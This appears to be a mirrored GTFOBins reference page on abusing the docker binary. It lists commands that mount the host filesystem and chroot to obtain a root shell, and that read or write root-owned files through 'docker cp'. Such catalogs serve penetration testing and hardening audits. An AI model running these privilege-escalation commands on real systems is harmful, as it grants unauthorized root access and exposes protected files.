GTFOBins.github.io/docker.md at dcbf66329aa2bc3202652fbc363f980ac5213730

mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00

Dominic Breuker dcbf66329a Add file read and write as per #64 (temporary solution)

2019-07-02 15:53:28 +02:00

description

functions

This requires the user to be privileged enough to run docker, i.e. being in the `docker` group or being `root`.

shell

file-write

file-read

sudo

suid

description	code
Any other Docker Linux image should work, e.g., `debian`. The resulting is a root shell.	docker run -v /:/mnt --rm -it alpine chroot /mnt sh

description	code
Write any file by copying it to an existing container and back to the target destination on the host. The file will be owned by root.	CONTAINER_ID=existing-docker-container echo "sensitive config" > /tmp/file.txt sudo docker cp /tmp/file.txt $CONTAINER_ID:/tmp/file.txt sudo docker cp $CONTAINER_ID:/tmp/file.txt /target/destination.txt

description	code
Read any file by copying it to an existing container and back to a new location on the host.	CONTAINER_ID=existing-docker-container sudo docker cp /root/protected.txt $CONTAINER_ID:/tmp/file.txt sudo docker cp $CONTAINER_ID:/tmp/file.txt /home/user/file.txt cat /home/user/file.txt

description	code
Any other Docker Linux image should work, e.g., `debian`. The resulting is a root shell.	sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh

description	code
Any other Docker Linux image should work, e.g., `debian`. The resulting is a root shell.	./docker run -v /:/mnt --rm -it alpine chroot /mnt sh